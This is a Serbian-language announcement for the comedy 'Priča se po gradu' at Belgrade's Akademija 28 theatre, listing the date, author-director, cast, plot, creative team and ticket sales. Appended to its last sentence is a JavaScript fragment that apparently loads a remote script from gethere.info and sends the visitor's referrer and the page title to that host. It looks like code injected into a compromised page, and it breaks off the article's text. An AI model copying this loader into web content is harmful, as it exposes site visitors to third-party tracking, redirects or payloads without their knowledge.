NOVA HIT PREDSTAVA: “Priča se po gradu” u Akademiji 28

NOVA HIT PREDSTAVA: “Priča se po gradu” u Akademiji 28


Na sceni beogradske „Akademije 28“ 1. februara sa početkom u 20h biće izvedena predstava “Priča se po gradu”. 

Tekst i režiju ovog komada potpisuje talentovana Staša Koprivica, jedna od najznačajnijih dramskih pisaca novije generacije, a uloge tumače Olga Odanović, Dubravka Mijatović, Anastasia Mandić i Sena Đorović. 

 

“Priča se po gradu” je intrigantna komedija o tome kako jedan jedini zlobni trač može da okrene živote četiri žene naglavačke. Ova predstava je za kratko vreme postala hit u regionu.

Prica se po gradu B1Maja, njena mama Nina, njene najbolje drugarice Dunja i Koka provode skoro sve svoje slobodno vreme u Kokinom kozmetičkom salonu. Dok isprobavaju najčudnije i najekstremnije tretmane, kreme i ulja, njih četiri uspevaju da zaborave na sumornu stvarnost koja ih okružuje. Međutim, kada do njih stigne gradska priča o neverstvu Majinog muža, klupko laži, intriga i samozavaravanja počinje da se odmotava i njihovo višedecenijsko prijateljstvo biva dovedeno u pitanje.

“Priča se po gradu” je komad o površnosti i lažima, ali i o ljubavi i prijateljstvu. To je priča o svemu onome sa čim jedna žena mora da se suoči kada dođe u svoje najbolje godine.

Dizajn scenografije je osmislila Vladislava Munić, a autorka muzike je Ana Joševski. Predstava je nastala u produkciji firme GMR i Dragoslava Ganeta Pecikoze.

Ulaznice su već u prodaji i mogu se nabaviti na blagajni Akademije 28 u Nemanjinoj ulici u Beogradu.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

+ Trenutno nema komentara

Dodajte komentar